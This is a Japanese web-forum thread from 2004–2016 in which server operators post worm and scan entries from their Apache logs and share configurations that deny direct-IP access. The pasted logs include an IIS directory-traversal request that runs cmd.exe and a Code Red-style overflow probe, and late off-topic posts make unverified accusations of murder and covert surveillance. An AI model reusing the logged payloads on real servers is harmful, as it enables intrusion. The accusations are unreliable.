218.114.60.82 - - [21/Jun/2004:21:55:14 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1042 "-" "-"
297:DNS未登録さん
04/06/22 00:08 .net
>>296
messengerサービスは日本語通るよ。
298:DNS未登録さん
04/06/25 22:10 .net
ほらよ。
ワームの場合やポートスキャンなどのIPアドレスベースのアクセスは、クエリを
ログに保存しない。かつ、すべてのリクエストを拒否する。
おまけで、拒否した403エラーをerror_logにも残さない。
LogFormat "%h %l %u %t \"%m %U %H\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" attacked
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" combined
# Reject IP Adress Access
<VirtualHost XXX.XXX.XXX.XXX:80>
CustomLog logs/access_log attacked
ErrorLog /dev/null
<Directory ~ ".*">
Order deny,allow
Deny from all
</Directory>
</VirtualHost>
<VirtualHost XXX.XXX.XXX.XXX:80>
ServerName www.example.com
DocumentRoot /usr/local/apache/htdocs
ServerAdmin webmaster@www.example.com
CustomLog logs/example_access_log extended combined
ErrorLog logs/example_error_log
</VirtualHost>
<VirtualHost XXX.XXX.XXX.XXX:80>
…
</VirtualHost>
<VirtualHost XXX.XXX.XXX.XXX:80>
…
</VirtualHost>
299:DNS未登録さん
04/06/25 22:23 44W99bib.net
ふふーん
300:DNS未登録さん
04/07/09 04:36 csRQH/jq.net
age
301:DNS未登録さん
04/07/23 16:06 .net
218.88.235.240 - - [23/Jul/2004:03:00:50 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCC・・・
アクセスしてみたら中国のサイトみたいだけど・・・
302:DNS未登録さん
04/07/23 20:38 .net
>>301
それアタックツールじゃない?
WinNTAutoAttackっていうやつ
303:DNS未登録さん
04/07/23 22:23 .net
203.205.99.199 - - [22/Jul/2004:01:33:57 +0900] "\xc8C\xc0\x1d" 501 - "-" "-"
203.205.99.199 - - [22/Jul/2004:01:34:44 +0900] "HZ\xc0\x1d" 501 - "-" "-"
203.205.99.199 - - [22/Jul/2004:01:38:12 +0900] "0\x9f\xc0\x1d" 501 - "-" "-"
最近、こういうのが来るようになったんですけど....
304:DNS未登録さん
04/07/24 00:20 vV4StFaU.net
>>303
うちにも来てますね。同じようなの。
メソッドがなくて、リクエスト文字列はバラバラ。
なんらかのワームと思われますけど、
共通の指紋がなくて検索に掛からずいまだ正体不明です。
305:DNS未登録さん
04/07/24 20:41 .net
Googlebotってのが怖い・・・
誰か助けて。
306:DNS未登録さん
04/07/24 20:48 .net
>>305
やべーよ、それに狙われたら終わりだよ。
個人情報全部抜かれてるよ、きっと。
307:DNS未登録さん
04/07/24 21:54 .net
>>305
うちなんかあえてGooglebotが来やすいように対策して
相手をはめてやろうと頑張ってるんだけど全然こないよ
orz
308:DNS未登録さん
04/07/25 09:02 JgINXHak.net
>>307
もしかして、昔、嘘教えられた人?
Googlebotに来て欲しいなら、robots.txt に
User-Agent: *
Disallow: /
て、書いちゃダメだよ。
人違いならイイんだけど、昔、検索サイトに登録されたいのでロボットに
来て欲しいという人に対して、上記ファイルを書けばロボットが来てくれる
と嘘を教えた人が居たから。
今でも嘘を信じてロボットを待ってるとしたら可哀想で。。。
309:DNS未登録さん
04/07/25 14:56 .net
>308
スレ違い。
# robots.txt を置いて検索蹴っていたとしても、ロボットが来なくなる
# わけじゃない。
# robots.txtは探すから。
#
# それすら来ない(accessログに残っていない)なら、、、
#
#
# まぁ、イ㌔ とだけ言っておこう。
310:DNS未登録さん
04/07/25 19:04 OSa9+g6L.net
先方へのお知らせ用のテンプレートってないでしょうかか?
やられていると思われるサーバーから当方のサーバーに、
SSHで進入しようとしたログを見つけました。
国内のとある建築デザイン会社のネットワーク内からなんですが。
お知らせしてあげようかなと思うものの、
一からメール起こすのもなんだかなぁと。
311:DNS未登録さん
04/08/01 23:30 .net
jedle.ms.mff.cuni.cz - - [31/Jul/2004:01:10:41 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl(以下略)
dns.520net.to - - [31/Jul/2004:15:58:28 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl(以下略)
こんなんもいっぱい来る…って、ワームじゃなくて故意か(^^;
312:DNS未登録さん
04/08/04 20:29 .net
>>311
それつい先日うちにも来た
313:DNS更新ミスさん
04/08/16 00:04 Fr/JI0uA.net
Virtual Host の設定例ですよん。
NameVirtualHost *
## default (unknown) domain
<VirtualHost *>
ServerName localhost
DocumentRoot /web/unknown
ErrorLog "|bin\rotatelogs.exe logs/unknown/error_%Y%m%d.log 86400 540"
CustomLog "|bin\rotatelogs.exe logs/unknown/access_%Y%m%d.log 86400 540" common
HostnameLookups On
<Directory "/web/unknown">
Options None
AllowOverride None
Order deny,allow
Deny from all
</Directory>
</VirtualHost>
## abcdefg.com
<VirtualHost *>
ServerName abcdefg.com
DocumentRoot /web/abcdefg.com
ErrorLog "|bin\rotatelogs.exe logs/abcdefg.com/error_%Y%m%d.log 86400 540"
CustomLog "|bin\rotatelogs.exe logs/abcdefg.com/access_%Y%m%d.log 86400 540" common
<Directory "/web/abcdefg.com">
Options ExecCGI
AllowOverride All
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
## vwxyx.info
<VirtualHost *>
ServerName vwxyx.info
DocumentRoot /web/vwxyx.info
ErrorLog "|bin\rotatelogs.exe logs/vwxyx.info/error_%Y%m%d.log 86400 540"
CustomLog "|bin\rotatelogs.exe logs/vwxyx.info/access_%Y%m%d.log 86400 540" common
<Directory "/web/vwxyx.info">
Options ExecCGI
AllowOverride All
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
一個目の設定は二個目三個目の設定に合致しなかったときに評価されるので自然と IP 直打ちによるアクセスと判断可能。
そして、IP 直打ちは access deny に設定する。
web/unknown 自体も作成しない。
あとね、ログを取らないってのはやめたほうがいいと思う。
ログを見て 「こういうアタックのされ方もあるんだな」 っていう知識にもなると思うわけですよ。
314:DNS未登録さん
04/08/16 00:11 .net
/web/unknownをdenyにすると、ワームのアクセスがあるたびに
エラーログに client denied by server configuration: /web/unknown が残ってウザくないか?
315:DNS未登録さん
04/08/16 00:29 .net
それがなぜかですね、
request failed: URI too long
としか書かれてない。
316:DNS未登録さん
04/08/16 01:22 .net
>>313
> あとね、ログを取らないってのはやめたほうがいいと思う。
> ログを見て 「こういうアタックのされ方もあるんだな」 っていう知識にもなると思うわけですよ。
言ってる事はもっともだ
でも、最近普通のlogすらチェックしてる時間無くて…
317:DNS未登録さん
04/08/16 02:00 .net
とりあえず、ありもしないページを要求してきたら、そのIP近辺はまとめてアクセス規制かけるようにしてる。
318:DNS未登録さん
04/08/16 02:07 .net
っつーかこのスレ来るような奴は基本的に分かってない。
319:DNS未登録さん
04/08/16 02:15 .net
>>318
ごめんなさい
320:DNS未登録さん
04/08/23 20:30 LGQaz3lx.net
OCNってろくに対応しないんでしたっけ?
321:DNS未登録さん
04/08/26 20:39 02qpB0nV.net
219.157.121.142
こんなのが・・・・・
322:DNS未登録さん
04/08/28 10:51 .net
219.154.151.29
219.154.8.152
219.154.151.29
YahooBB219037248174.bbtec.net
323:DNS未登録さん
05/02/06 01:52:04 .net
記念かきこんぶ
221.137.138.141
221.14.244.126
324:DNS未登録さん
06/05/19 21:46:21 T1xeAzGq.net
age
325:DNS未登録さん
06/06/16 13:24:01 5jVbLKex.net
かなり古いすれだ、あ
326:DNS未登録さん
06/06/27 02:54:33 JkbEj3FW.net
ワームにやられてるかどうかもわかりませんが何か?
327:DNS未登録さん
06/06/28 00:05:42 j7u0ZRCI.net
ワームにやられたー!
わーーーむ!
328:DNS未登録さん
08/01/06 01:16:50 .net
ほ
329:DNS未登録さん
08/10/19 22:27:37 .net
>>324
その通り。
努力が足りない非正規雇用の増加や、
正社員の中にもサービス残業が嫌だなどという甘えた輩が増えていることは
その証拠でしょうね。
330:SvLQzEuhpfZYQP
09/10/23 01:18:19 .net
The genre began to expand near the turn of century with the development of dime novels and pulp magazines. ,
331:AvFKOEZdxFemzT
09/10/23 02:37:36 .net
These are the people he feels at ease with, whose working methods he respects. ,
332:DNS未登録さん
09/10/26 21:30:27 .net
鯖だけにアニサキスか
333: 【32.7m】 電脳プリオン
12/05/06 14:23:37.93 .net BE:162163182-PLT(12079)
∧_∧
( ・∀・) 人 ガッ
( つ―-‐-‐-‐-‐-‐○ < >__Λ∩
人 Y ノ. V`Д´)/
し(_) / ←>>114
334:DNS未登録さん
12/06/17 12:29:53.78 JB+jhIyV.net
ワーム
335:DNS未登録さん
12/07/30 16:10:20.09 vQp3+E0v.net
1だが、このスレまだ残ってるんだな。
保守がてらあげておこう。
336:DNS未登録さん
12/08/15 03:25:11.17 .net
だめだって(~_~;)そとはだめ(。-_-。)はいきゅうみすですよこれはf^_^;)
337:DNS未登録さん
15/12/15 18:21:32.74 Hjy4waol.net
この鯖vvvにやられてます
338:DNS未登録さん
16/09/03 22:57:54.15 .net
てすと
339:DNS未登録さん
16/09/26 18:06:31.30 tCdD0TZQ.net
【緊急】自衛隊内部で事件発生か!?
東海ア マ
北濱さんを殺害したのか? ニセモノよ! どこに遺体を埋めたんだ?
URLリンク(twitter.com) aiama/status/779592042154299392
君らが北濱さんを殺害して遺体を埋めるとすれば信太山演習場だろうな
URLリンク(twitter.com) aiama/status/779592576550567936
すぐにカマに引っかかってくれる、とても素直な性格だね
労せずして君たちが殺害犯であることがよく分かる
君たちの知能程度もよく分かる
君たちが消してしまった、北濱さんの自衛隊内イジメ記事への評論を見れば誰でも君たちが自衛隊員であることが分かる
URLリンク(twitter.com) aiama/status/779600074561073152
「信太山演習場に遺体を埋めた」と書いた直後に急に激しく反応してるね
友人の自衛官に頼んで信太山演習場内に掘り返し跡がないか調べてもらう予定だったが、
そこまで反応すると真実性が高そうだ
URLリンク(twitter.com) aiama/status/779602473660981248
とうとう北濱幹也のニセモノにブロックされてしまった
北濱さんの遺体を信太山演習場に埋めたと書いたら、もの凄い反応だった
URLリンク(twitter.com) aiama/status/779608668136284160
20時5分 無言の不審電話がかかってきた
たぶんニセ北濱グループだろうね
いよいよ襲ってくるのかな?
URLリンク(twitter.com) aiama/status/779637957649063937
340:DNS未登録さん
16/10/28 14:17:24.90 CX7Q2Qgw.net
私は元創価の会員でした。
すぐ隣に防衛省の背広組の官舎があるのですが、
自分の家の窓にUSB接続のwebカメラを貼り付けて、そこの動画を撮影し続け、
学会本部に送っていました。
別に大したものは写っていません。ゴミ出しとか奥さんが子供を遊ばせている所とか。
官舎が老朽化して使われなくなってから、
今まで法人税(うちは自営業です)をほぼ払わなくても済んでいたのが、
もう守ってやれないのでこれからは満額申告するように言われました。
納得がいかないと言うと、君は自業自得で餓鬼地獄へ落ちる、
朝夕南無妙法蓮華経と三千回ずつ唱えて心をきれいにしなさいと言われ
馬鹿らしくなって脱会しました。
それ以来、どこへ行くにもぞろ目ナンバーの車につけまわされたり大変な日々です。
全部自分の出来心から始まった事で、どこに訴えるわけにもいかないのですが、
なんとかあの人たちと縁を切った上で新しい始まりを迎える方法はないんだろうか。